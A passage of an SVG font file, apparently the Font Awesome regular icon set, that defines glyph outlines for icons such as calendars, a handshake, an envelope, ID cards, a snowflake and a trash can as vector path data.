c27.1934 12.8467 60.3799 5.66992 79.8721 -19.0986zM80.9854 168.303c-14.4004 20.2119 -43.8008 -2.38281 -29.3945 -22.6055l109.712 -154c3.43457 -4.81934 8.92871 -7.69727 14.6973 -7.69727h178.285c8.49219 0 15.8037 5.99414 17.7822 14.5762l27.4297 119.001
c0.333008 1.44629 0.501953 2.93457 0.501953 4.42285v84c0 25.1602 -36.5713 25.1211 -36.5713 0c0 -8.83594 -7.16309 -16 -16 -16h-6.85645c-8.83691 0 -16 7.16406 -16 16v21c0 25.1602 -36.5713 25.1201 -36.5713 0v-21c0 -8.83594 -7.16309 -16 -16 -16h-6.85938
c-8.83691 0 -16 7.16406 -16 16v35c0 25.1602 -36.5703 25.1201 -36.5703 0v-35c0 -8.83594 -7.16309 -16 -16 -16h-6.85742c-8.83691 0 -16 7.16406 -16 16v175c0 25.1602 -36.5713 25.1201 -36.5713 0v-241.493c0 -15.5703 -20.0352 -21.9092 -29.0303 -9.2832z
M176.143 48v96c0 8.83691 6.26855 16 14 16h6c7.73242 0 14 -7.16309 14 -16v-96c0 -8.83691 -6.26758 -16 -14 -16h-6c-7.73242 0 -14 7.16309 -14 16zM251.571 48v96c0 8.83691 6.26758 16 14 16h6c7.73145 0 14 -7.16309 14 -16v-96c0 -8.83691 -6.26855 -16 -14 -16h-6
c-7.73242 0 -14 7.16309 -14 16zM327 48v96c0 8.83691 6.26758 16 14 16h6c7.73242 0 14 -7.16309 14 -16v-96c0 -8.83691 -6.26758 -16 -14 -16h-6c-7.73242 0 -14 7.16309 -14 16z" />
    <glyph glyph-name="hand-peace" unicode="&#xf25b;" horiz-adv-x="448" 
d="M362.146 256.024c42.5908 13.3184 85.8535 -19.0684 85.8535 -64.0244l-0.0117188 -70.001c-0.000976562 -4.25 -0.775391 -11.0615 -1.72949 -15.2031l-27.4268 -118.999c-6.99707 -30.3564 -33.8105 -51.7969 -64.5547 -51.7969h-205.702
c-23.8447 0 -45.9502 13.0303 -57.6904 34.0059l-54.8525 97.999c-19.2607 34.4092 -5.82422 67.2617 24.7324 92.2178l-55.7568 144.928c-14.5791 37.8867 3.72754 80.6113 41.2012 95.6416c37.6406 15.0977 80.3691 -3.63477 95.1123 -41.9424l18.6787 -78.8496
l-9.14062 94c0 40.8037 32.8096 74 73.1396 74s73.1406 -33.1963 73.1406 -74v-87.6348c26.2451 3.6748 51.2959 -8.69238 65.0068 -30.3408zM399.987 122l-0.000976562 70c0 25.1602 -36.5674 25.1201 -36.5674 0c0 -8.83691 -7.16309 -16 -16 -16h-6.85547
c-8.83789 0 -16 7.16309 -16 16v28c0 25.1592 -36.5674 25.1221 -36.5674 0v-28c0 -8.83691 -7.16309 -16 -16 -16h-6.85645c-8.83691 0 -16 7.16309 -16 16v182c0 34.4297 -50.2803 34.375 -50.2803 0v-182c0 -8.83691 -7.16309 -16 -16 -16h-11.6328v0
c-6.06445 0 -12.7549 4.59375 -14.9326 10.2539l-59.7842 155.357c-12.1396 31.5518 -59.2842 13.4326 -46.7168 -19.2227l64.0898 -166.549c0.589844 -1.53125 1.06738 -4.10547 1.06738 -5.74609c0 -4.19043 -2.63379 -9.74219 -5.87891 -12.3926l-26.6475 -21.7646
c-7.12695 -5.81934 -9.06445 -16.3467 -4.50781 -24.4873l54.8535 -98c3.26367 -5.82812 9.31934 -9.44922 15.8057 -9.44922h205.701c8.49121 0 15.8037 5.99414 17.7812 14.5762l27.4277 119.001c0.333008 1.44629 0.501953 2.93457 0.501953 4.42285z" />
    <glyph glyph-name="registered" unicode="&#xf25d;" 
d="M256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248zM256 -8c110.549 0 200 89.4678 200 200c0 110.549 -89.4678 200 -200 200c-110.549 0 -200 -89.4688 -200 -200c0 -110.549 89.4678 -200 200 -200z
M366.442 73.791c4.40332 -7.99219 -1.37012 -17.791 -10.5107 -17.791h-42.8096h-0.0126953c-3.97559 0 -8.71582 2.84961 -10.5801 6.36035l-47.5156 89.3027h-31.958v-83.6631c0 -6.61719 -5.38281 -12 -12 -12h-38.5674c-6.61719 0 -12 5.38281 -12 12v248.304
c0 6.61719 5.38281 12 12 12h78.667c71.251 0 101.498 -32.749 101.498 -85.252c0 -31.6123 -15.2148 -59.2969 -39.4824 -73.1758c3.02148 -4.61719 0.225586 0.199219 53.2715 -96.085zM256.933 208.094c20.9131 0 32.4307 11.5186 32.4316 32.4316
c0 19.5752 -6.5127 31.709 -38.9297 31.709h-27.377v-64.1406h33.875z" />
    <glyph glyph-name="calendar-plus" unicode="&#xf271;" horiz-adv-x="448" 
d="M336 156v-24c0 -6.59961 -5.40039 -12 -12 -12h-76v-76c0 -6.59961 -5.40039 -12 -12 -12h-24c-6.59961 0 -12 5.40039 -12 12v76h-76c-6.59961 0 -12 5.40039 -12 12v24c0 6.59961 5.40039 12 12 12h76v76c0 6.59961 5.40039 12 12 12h24c6.59961 0 12 -5.40039 12 -12
v-76h76c6.59961 0 12 -5.40039 12 -12zM448 336v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40
c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48zM400 -10v298h-352v-298c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="calendar-minus" unicode="&#xf272;" horiz-adv-x="448" 
d="M124 120c-6.59961 0 -12 5.40039 -12 12v24c0 6.59961 5.40039 12 12 12h200c6.59961 0 12 -5.40039 12 -12v-24c0 -6.59961 -5.40039 -12 -12 -12h-200zM448 336v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h48v52
c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48zM400 -10v298h-352v-298c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="calendar-times" unicode="&#xf273;" horiz-adv-x="448" 
d="M311.7 73.2998l-17 -17c-4.7002 -4.7002 -12.2998 -4.7002 -17 0l-53.7002 53.7998l-53.7002 -53.6992c-4.7002 -4.7002 -12.2998 -4.7002 -17 0l-17 17c-4.7002 4.69922 -4.7002 12.2998 0 17l53.7002 53.6992l-53.7002 53.7002c-4.7002 4.7002 -4.7002 12.2998 0 17
l17 17c4.7002 4.7002 12.2998 4.7002 17 0l53.7002 -53.7002l53.7002 53.7002c4.7002 4.7002 12.2998 4.7002 17 0l17 -17c4.7002 -4.7002 4.7002 -12.2998 0 -17l-53.7998 -53.7998l53.6992 -53.7002c4.80078 -4.7002 4.80078 -12.2998 0.100586 -17zM448 336v-352
c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h48v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h128v52c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-52h48c26.5 0 48 -21.5 48 -48zM400 -10
v298h-352v-298c0 -3.2998 2.7002 -6 6 -6h340c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="calendar-check" unicode="&#xf274;" horiz-adv-x="448" 
d="M400 384c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h48v52c0 6.62695 5.37305 12 12 12h40c6.62695 0 12 -5.37305 12 -12v-52h128v52c0 6.62695 5.37305 12 12 12h40
c6.62695 0 12 -5.37305 12 -12v-52h48zM394 -16c3.31152 0 6 2.68848 6 6v298h-352v-298c0 -3.31152 2.68848 -6 6 -6h340zM341.151 184.65l-142.31 -141.169c-4.70508 -4.66699 -12.3027 -4.6377 -16.9707 0.0673828l-75.0908 75.6992
c-4.66699 4.70508 -4.6377 12.3027 0.0673828 16.9707l22.7197 22.5361c4.70508 4.66699 12.3027 4.63672 16.9697 -0.0693359l44.1035 -44.4609l111.072 110.182c4.70508 4.66699 12.3027 4.63672 16.9707 -0.0683594l22.5361 -22.7178
c4.66699 -4.70508 4.63672 -12.3027 -0.0683594 -16.9697z" />
    <glyph glyph-name="map" unicode="&#xf279;" horiz-adv-x="576" 
d="M560.02 416c8.4502 0 15.9805 -6.83008 15.9805 -16.0195v-346.32c0 -11.9609 -9.01367 -25.2705 -20.1201 -29.71l-151.83 -52.8105c-5.32617 -1.7334 -14.1953 -3.13965 -19.7969 -3.13965c-5.7373 0 -14.8105 1.47363 -20.2529 3.29004l-172 60.71l-170.05 -62.8398
c-1.99023 -0.790039 -4 -1.16016 -5.95996 -1.16016c-8.45996 0 -15.9902 6.83008 -15.9902 16.0195v346.32c0.00292969 11.959 9.0166 25.2686 20.1201 29.71l151.83 52.8105c6.43945 2.08984 13.1201 3.13965 19.8096 3.13965
c5.73242 -0.00195312 14.8008 -1.47168 20.2402 -3.28027l172 -60.7197h0.00976562l170.05 62.8398c1.98047 0.790039 4 1.16016 5.95996 1.16016zM224 357.58v-285.97l128 -45.1904v285.97zM48 29.9502l127.36 47.0801l0.639648 0.229492v286.2l-128 -44.5303v-288.979z
M528 65.0801v288.97l-127.36 -47.0693l-0.639648 -0.240234v-286.19z" />
    <glyph glyph-name="comment-alt" unicode="&#xf27a;" 
d="M448 448c35.2998 0 64 -28.7002 64 -64v-288c0 -35.2998 -28.7002 -64 -64 -64h-144l-124.9 -93.5996c-2.19922 -1.7002 -4.69922 -2.40039 -7.09961 -2.40039c-6.2002 0 -12 4.90039 -12 12v84h-96c-35.2998 0 -64 28.7002 -64 64v288c0 35.2998 28.7002 64 64 64h384z
M464 96v288c0 8.7998 -7.2002 16 -16 16h-384c-8.7998 0 -16 -7.2002 -16 -16v-288c0 -8.7998 7.2002 -16 16 -16h144v-60l67.2002 50.4004l12.7998 9.59961h160c8.7998 0 16 7.2002 16 16z" />
    <glyph glyph-name="pause-circle" unicode="&#xf28b;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM256 -8c110.5 0 200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200s89.5 -200 200 -200zM352 272v-160c0 -8.7998 -7.2002 -16 -16 -16h-48
c-8.7998 0 -16 7.2002 -16 16v160c0 8.7998 7.2002 16 16 16h48c8.7998 0 16 -7.2002 16 -16zM240 272v-160c0 -8.7998 -7.2002 -16 -16 -16h-48c-8.7998 0 -16 7.2002 -16 16v160c0 8.7998 7.2002 16 16 16h48c8.7998 0 16 -7.2002 16 -16z" />
    <glyph glyph-name="stop-circle" unicode="&#xf28d;" 
d="M504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM56 192c0 -110.5 89.5 -200 200 -200s200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200zM352 272v-160c0 -8.7998 -7.2002 -16 -16 -16h-160
c-8.7998 0 -16 7.2002 -16 16v160c0 8.7998 7.2002 16 16 16h160c8.7998 0 16 -7.2002 16 -16z" />
    <glyph glyph-name="handshake" unicode="&#xf2b5;" horiz-adv-x="640" 
d="M519.2 320.1h120.8v-255.699h-64c-17.5 0 -31.7998 14.1992 -31.9004 31.6992h-57.8994c-1.7998 -8.19922 -5.2998 -16.0996 -10.9004 -23l-26.2002 -32.2998c-15.7998 -19.3994 -41.8994 -25.5 -64 -16.7998c-13.5 -16.5996 -30.5996 -24 -48.7998 -24
c-15.0996 0 -28.5996 5.09961 -41.0996 15.9004c-31.7998 -21.9004 -74.7002 -21.3008 -105.601 3.7998l-84.5996 76.3994h-9.09961c-0.100586 -17.5 -14.3008 -31.6992 -31.9004 -31.6992h-64v255.699h118l47.5996 47.6006c10.5 10.3994 24.8008 16.2998 39.6006 16.2998
h226.8v0c12.7812 0 30.5225 -7.30273 39.5996 -16.2998zM48 96.4004c8.7998 0 16 7.09961 16 16c0 8.7998 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.80078 7.2002 -16 16 -16zM438 103.3c2.7002 3.40039 2.2002 8.5 -1.2002 11.2998l-108.2 87.8008l-8.19922 -7.5
c-40.3008 -36.8008 -86.7002 -11.8008 -101.5 4.39941c-26.7002 29 -25 74.4004 4.39941 101.3l38.7002 35.5h-56.7002c-2 -0.799805 -3.7002 -1.5 -5.7002 -2.2998l-61.6992 -61.5996h-41.9004v-128.101h27.7002l97.2998 -88
c16.0996 -13.0996 41.4004 -10.5 55.2998 6.60059l15.6006 19.2002l36.7998 -31.5c3 -2.40039 12 -4.90039 18 2.39941l30 36.5l23.8994 -19.3994c3.5 -2.80078 8.5 -2.2002 11.3008 1.19922zM544 144.1v128h-44.7002l-61.7002 61.6006
c-1.39941 1.5 -3.39941 2.2998 -5.5 2.2998l-83.6992 -0.200195c-10 0 -19.6006 -3.7002 -27 -10.5l-65.6006 -60.0996c-9.7002 -8.7998 -10.5 -24 -1.2002 -33.9004c8.90039 -9.39941 25.1006 -8.7002 34.6006 0l55.2002 50.6006c6.5 5.89941 16.5996 5.5 22.5996 -1
l10.9004 -11.7002c6 -6.5 5.5 -16.6006 -1 -22.6006l-12.5 -11.3994l102.699 -83.4004c2.80078 -2.2998 5.40039 -4.89941 7.7002 -7.7002h69.2002zM592 96.4004c8.7998 0 16 7.09961 16 16c0 8.7998 -7.2002 16 -16 16s-16 -7.2002 -16 -16c0 -8.80078 7.2002 -16 16 -16z
" />
    <glyph glyph-name="envelope-open" unicode="&#xf2b6;" 
d="M494.586 283.484c9.6123 -7.94824 17.4141 -24.5205 17.4141 -36.9932v-262.491c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v262.515c0 12.5166 7.84668 29.1279 17.5146 37.0771c4.08008 3.35449 110.688 89.0996 135.15 108.549
c22.6992 18.1426 60.1299 55.8594 103.335 55.8594c43.4365 0 81.2314 -38.1914 103.335 -55.8594c23.5283 -18.707 130.554 -104.773 135.251 -108.656zM464 -10v253.632v0.00488281c0 1.5791 -0.996094 3.66602 -2.22363 4.6582
c-15.8633 12.8232 -108.793 87.5752 -132.366 106.316c-17.5527 14.0195 -49.7168 45.3887 -73.4102 45.3887c-23.6016 0 -55.2451 -30.8799 -73.4102 -45.3887c-23.5713 -18.7393 -116.494 -93.4795 -132.364 -106.293
c-1.40918 -1.13965 -2.22559 -2.85254 -2.22559 -4.66504v-253.653c0 -3.31152 2.68848 -6 6 -6h404c3.31152 0 6 2.68848 6 6zM432.009 177.704c4.24902 -5.15918 3.46484 -12.7949 -1.74512 -16.9814c-28.9746 -23.2822 -59.2734 -47.5967 -70.9287 -56.8623
c-22.6992 -18.1436 -60.1299 -55.8604 -103.335 -55.8604c-43.4521 0 -81.2871 38.2373 -103.335 55.8604c-11.2793 8.9668 -41.7441 33.4131 -70.9268 56.8643c-5.20996 4.1875 -5.99316 11.8223 -1.74512 16.9814l15.2578 18.5283
c4.17773 5.07227 11.6572 5.84277 16.7793 1.72559c28.6182 -23.001 58.5654 -47.0352 70.5596 -56.5713c17.5527 -14.0195 49.7168 -45.3887 73.4102 -45.3887c23.6016 0 55.2461 30.8799 73.4102 45.3887c11.9941 9.53516 41.9434 33.5703 70.5625 56.5684
c5.12207 4.11621 12.6016 3.3457 16.7783 -1.72656z" />
    <glyph glyph-name="address-book" unicode="&#xf2b9;" horiz-adv-x="448" 
d="M436 288h-20v-64h20c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-20v-64h20c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-20v-48c0 -26.5 -21.5 -48 -48 -48h-320c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48
h320c26.5 0 48 -21.5 48 -48v-48h20c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12zM368 -16v416h-320v-416h320zM208 192c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM118.4 64
c-12.4004 0 -22.4004 8.59961 -22.4004 19.2002v19.2002c0 31.7998 30.0996 57.5996 67.2002 57.5996c11.3994 0 17.8994 -8 44.7998 -8c26.0996 0 34 8 44.7998 8c37.1006 0 67.2002 -25.7998 67.2002 -57.5996v-19.2002c0 -10.6006 -10 -19.2002 -22.4004 -19.2002
h-179.199z" />
    <glyph glyph-name="address-card" unicode="&#xf2bb;" horiz-adv-x="576" 
d="M528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480zM528 16v352h-480v-352h480zM208 192c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64z
M118.4 64c-12.4004 0 -22.4004 8.59961 -22.4004 19.2002v19.2002c0 31.7998 30.0996 57.5996 67.2002 57.5996c11.3994 0 17.8994 -8 44.7998 -8c26.0996 0 34 8 44.7998 8c37.1006 0 67.2002 -25.7998 67.2002 -57.5996v-19.2002
c0 -10.6006 -10 -19.2002 -22.4004 -19.2002h-179.199zM360 128c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h112c4.40039 0 8 -3.59961 8 -8v-16c0 -4.40039 -3.59961 -8 -8 -8h-112zM360 192c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h112
c4.40039 0 8 -3.59961 8 -8v-16c0 -4.40039 -3.59961 -8 -8 -8h-112zM360 256c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h112c4.40039 0 8 -3.59961 8 -8v-16c0 -4.40039 -3.59961 -8 -8 -8h-112z" />
    <glyph glyph-name="user-circle" unicode="&#xf2bd;" horiz-adv-x="496" 
d="M248 344c53 0 96 -43 96 -96s-43 -96 -96 -96s-96 43 -96 96s43 96 96 96zM248 200c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48zM248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM248 -8
c49.7002 0 95.0996 18.2998 130.1 48.4004c-14.8994 23 -40.3994 38.5 -69.5996 39.5c-20.7998 -6.5 -40.5996 -9.60059 -60.5 -9.60059s-39.7002 3.2002 -60.5 9.60059c-29.2002 -0.900391 -54.7002 -16.5 -69.5996 -39.5c35 -30.1006 80.3994 -48.4004 130.1 -48.4004z
M410.7 76.0996c23.3994 32.7002 37.2998 72.7002 37.2998 115.9c0 110.3 -89.7002 200 -200 200s-200 -89.7002 -200 -200c0 -43.2002 13.9004 -83.2002 37.2998 -115.9c24.5 31.4004 62.2002 51.9004 105.101 51.9004c10.1992 0 26.0996 -9.59961 57.5996 -9.59961
c31.5996 0 47.4004 9.59961 57.5996 9.59961c43 0 80.7002 -20.5 105.101 -51.9004z" />
    <glyph glyph-name="id-badge" unicode="&#xf2c1;" horiz-adv-x="384" 
d="M336 448c26.5 0 48 -21.5 48 -48v-416c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v416c0 26.5 21.5 48 48 48h288zM336 -16v416h-288v-416h288zM144 336c-8.7998 0 -16 7.2002 -16 16s7.2002 16 16 16h96c8.7998 0 16 -7.2002 16 -16s-7.2002 -16 -16 -16
h-96zM192 160c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64zM102.4 32c-12.4004 0 -22.4004 8.59961 -22.4004 19.2002v19.2002c0 31.7998 30.0996 57.5996 67.2002 57.5996c11.3994 0 17.8994 -8 44.7998 -8
c26.0996 0 34 8 44.7998 8c37.1006 0 67.2002 -25.7998 67.2002 -57.5996v-19.2002c0 -10.6006 -10 -19.2002 -22.4004 -19.2002h-179.199z" />
    <glyph glyph-name="id-card" unicode="&#xf2c2;" horiz-adv-x="576" 
d="M528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480zM528 16v288h-480v-288h32.7998c-1 4.5 -0.799805 -3.59961 -0.799805 22.4004c0 31.7998 30.0996 57.5996 67.2002 57.5996
c11.3994 0 17.8994 -8 44.7998 -8c26.0996 0 34 8 44.7998 8c37.1006 0 67.2002 -25.7998 67.2002 -57.5996c0 -26 0.0996094 -17.9004 -0.799805 -22.4004h224.8zM360 96c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h112c4.40039 0 8 -3.59961 8 -8v-16
c0 -4.40039 -3.59961 -8 -8 -8h-112zM360 160c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h112c4.40039 0 8 -3.59961 8 -8v-16c0 -4.40039 -3.59961 -8 -8 -8h-112zM360 224c-4.40039 0 -8 3.59961 -8 8v16c0 4.40039 3.59961 8 8 8h112
c4.40039 0 8 -3.59961 8 -8v-16c0 -4.40039 -3.59961 -8 -8 -8h-112zM192 128c-35.2998 0 -64 28.7002 -64 64s28.7002 64 64 64s64 -28.7002 64 -64s-28.7002 -64 -64 -64z" />
    <glyph glyph-name="window-maximize" unicode="&#xf2d0;" 
d="M464 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h416zM464 22v234h-416v-234c0 -3.2998 2.7002 -6 6 -6h404c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="window-minimize" unicode="&#xf2d1;" 
d="M480 -32h-448c-17.7002 0 -32 14.2998 -32 32s14.2998 32 32 32h448c17.7002 0 32 -14.2998 32 -32s-14.2998 -32 -32 -32z" />
    <glyph glyph-name="window-restore" unicode="&#xf2d2;" 
d="M464 448c26.5 0 48 -21.5 48 -48v-320c0 -26.5 -21.5 -48 -48 -48h-48v-48c0 -26.5 -21.5 -48 -48 -48h-320c-26.5 0 -48 21.5 -48 48v320c0 26.5 21.5 48 48 48h48v48c0 26.5 21.5 48 48 48h320zM368 -16v208h-320v-208h320zM464 80v320h-320v-48h224
c26.5 0 48 -21.5 48 -48v-224h48z" />
    <glyph glyph-name="snowflake" unicode="&#xf2dc;" horiz-adv-x="448" 
d="M440.1 92.7998c7.60059 -4.39941 10.1006 -14.2002 5.5 -21.7002l-7.89941 -13.8994c-4.40039 -7.7002 -14 -10.2998 -21.5 -5.90039l-39.2002 23l9.09961 -34.7002c2.30078 -8.5 -2.69922 -17.2998 -11.0996 -19.5996l-15.2002 -4.09961
c-8.39941 -2.30078 -17.0996 2.7998 -19.2998 11.2998l-21.2998 81l-71.9004 42.2002v-84.5l58.2998 -59.3008c6.10059 -6.19922 6.10059 -16.3994 0 -22.5996l-11.0996 -11.2998c-6.09961 -6.2002 -16.0996 -6.2002 -22.2002 0l-24.8994 25.3994v-46.0996
c0 -8.7998 -7 -16 -15.7002 -16h-15.7002c-8.7002 0 -15.7002 7.2002 -15.7002 16v45.9004l-24.8994 -25.4004c-6.10059 -6.2002 -16.1006 -6.2002 -22.2002 0l-11.1006 11.2998c-6.09961 6.2002 -6.09961 16.4004 0 22.6006l58.3008 59.2998v84.5l-71.9004 -42.2002
l-21.2998 -81c-2.2998 -8.5 -10.9004 -13.5996 -19.2998 -11.2998l-15.2002 4.09961c-8.40039 2.2998 -13.2998 11.1006 -11.1006 19.6006l9.10059 34.6992l-39.2002 -23c-7.5 -4.39941 -17.2002 -1.7998 -21.5 5.90039l-7.90039 13.9004
c-4.2998 7.69922 -1.69922 17.5 5.80078 21.8994l39.1992 23l-34.0996 9.2998c-8.40039 2.30078 -13.2998 11.1006 -11.0996 19.6006l4.09961 15.5c2.2998 8.5 10.9004 13.5996 19.2998 11.2998l79.7002 -21.7002l71.9004 42.2002l-71.9004 42.2002l-79.7002 -21.7002
c-8.39941 -2.2998 -17.0996 2.7998 -19.2998 11.2998l-4.09961 15.5c-2.30078 8.5 2.69922 17.2998 11.0996 19.6006l34.0996 9.09961l-39.1992 23c-7.60059 4.5 -10.1006 14.2002 -5.80078 21.9004l7.90039 13.8994c4.40039 7.7002 14 10.2998 21.5 5.90039l39.2002 -23
l-9.10059 34.7002c-2.2998 8.5 2.7002 17.2998 11.1006 19.5996l15.2002 4.09961c8.39941 2.30078 17.0996 -2.7998 19.2998 -11.2998l21.2998 -81l71.9004 -42.2002v84.5l-58.3008 59.3008c-6.09961 6.19922 -6.09961 16.3994 0 22.5996l11.5 11.2998
c6.10059 6.2002 16.1006 6.2002 22.2002 0l24.9004 -25.3994v46.0996c0 8.7998 7 16 15.7002 16h15.6992c8.7002 0 15.7002 -7.2002 15.7002 -16v-45.9004l24.9004 25.4004c6.09961 6.2002 16.0996 6.2002 22.2002 0l11.0996 -11.2998
c6.09961 -6.2002 6.09961 -16.4004 0 -22.6006l-58.2998 -59.2998v-84.5l71.8994 42.2002l21.3008 81c2.2998 8.5 10.8994 13.5996 19.2998 11.2998l15.2002 -4.09961c8.39941 -2.2998 13.2998 -11.1006 11.0996 -19.6006l-9.09961 -34.6992l39.1992 23
c7.5 4.39941 17.2002 1.7998 21.5 -5.90039l7.90039 -13.9004c4.2998 -7.69922 1.7002 -17.5 -5.7998 -21.8994l-39.2002 -23l34.0996 -9.2998c8.40039 -2.30078 13.3008 -11.1006 11.1006 -19.6006l-4.10059 -15.5c-2.2998 -8.5 -10.8994 -13.5996 -19.2998 -11.2998
l-79.7002 21.7002l-71.8994 -42.2002l71.7998 -42.2002l79.7002 21.7002c8.39941 2.2998 17.0996 -2.7998 19.2998 -11.2998l4.09961 -15.5c2.30078 -8.5 -2.69922 -17.2998 -11.0996 -19.6006l-34.0996 -9.2998z" />
    <glyph glyph-name="trash-alt" unicode="&#xf2ed;" horiz-adv-x="448" 
d="M268 32c-6.62402 0 -12 5.37598 -12 12v216c0 6.62402 5.37598 12 12 12h24c6.62402 0 12 -5.37598 12 -12v-216c0 -6.62402 -5.37598 -12 -12 -12h-24zM432 368c8.83203 0 16 -7.16797 16 -16v-16c0 -8.83203 -7.16797 -16 -16 -16h-16v-336
c0 -26.4961 -21.5039 -48 -48 -48h-288c-26.4961 0 -48 21.5039 -48 48v336h-16c-8.83203 0 -16 7.16797 -16 16v16c0 8.83203 7.16797 16 16 16h82.4102l34.0195 56.7002c7.71875 12.8613 26.1572 23.2998 41.1572 23.2998h0.00292969h100.82h0.0224609
c15 0 33.4385 -10.4385 41.1572 -23.2998l34 -56.7002h82.4102zM171.84 397.09l-17.4502 -29.0898h139.221l-17.46 29.0898c-0.96582 1.60645 -3.26953 2.91016 -5.14355 2.91016h-0.00683594h-94h-0.0166016c-1.87402 0 -4.17871 -1.30371 -5.14355 -2.91016zM368 -16v336
h-288v-336h288zM156 32c-6.62402 0 -12 5.37598 -12 12v216c0 6.62402 5.37598 12 12 12h24c6.62402 0 12 -5.37598 12 -12v-216c0 -6.62402 -5.37598 -12 -12 -12h-24z" />
    <glyph glyph-name="images" unicode="&#xf302;" horiz-adv-x="576" 
d="M480 32v-16c0 -26.5098 -21.4902 -48 -48 -48h-384c-26.5098 0 -48 21.4902 -48 48v256c0 26.5098 21.4902 48 48 48h16v-48h-10c-3.31152 0 -6 -2.68848 -6 -6v-244c0 -3.31152 2.68848 -6 6 -6h372c3.31152 0 6 2.68848 6 6v10h48zM522 368h-372
c-3.31152 0 -6 -2.68848 -6 -6v-244c0 -3.31152 2.68848 -6 6 -6h372c3.31152 0 6 2.68848 6 6v244c0 3.31152 -2.68848 6 -6 6zM528 416c26.5098 0 48 -21.4902 48 -48v-256c0 -26.5098 -21.4902 -48 -48 -48h-384c-26.5098 0 -48 21.4902 -48 48v256
c0 26.5098 21.4902 48 48 48h384zM264 304c0 -22.0908 -17.9092 -40 -40 -40s-40 17.9092 -40 40s17.9092 40 40 40s40 -17.9092 40 -40zM192 208l39.5146 39.5146c4.68652 4.68652 12.2842 4.68652 16.9717 0l39.5137 -39.5146l103.515 103.515
c4.68652 4.68652 12.2842 4.68652 16.9717 0l71.5137 -71.5146v-80h-288v48z" />
    <glyph glyph-name="clipboard" unicode="&#xf328;" horiz-adv-x="384" 
d="M336 384c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-288c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h80c0 35.2998 28.7002 64 64 64s64 -28.7002 64 -64h80zM192 408c-13.2998 0 -24 -10.7002 -24 -24s10.7002 -24 24 -24s24 10.7002 24 24
s-10.7002 24 -24 24zM336 -10v340c0 3.2998 -2.7002 6 -6 6h-42v-36c0 -6.59961 -5.40039 -12 -12 -12h-168c-6.59961 0 -12 5.40039 -12 12v36h-42c-3.2998 0 -6 -2.7002 -6 -6v-340c0 -3.2998 2.7002 -6 6 -6h276c3.2998 0 6 2.7002 6 6z" />
    <glyph glyph-name="arrow-alt-circle-down" unicode="&#xf358;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM256 -8c110.5 0 200 89.5 200 200s-89.5 200 -200 200s-200 -89.5 -200 -200s89.5 -200 200 -200zM224 308c0 6.59961 5.40039 12 12 12h40c6.59961 0 12 -5.40039 12 -12v-116
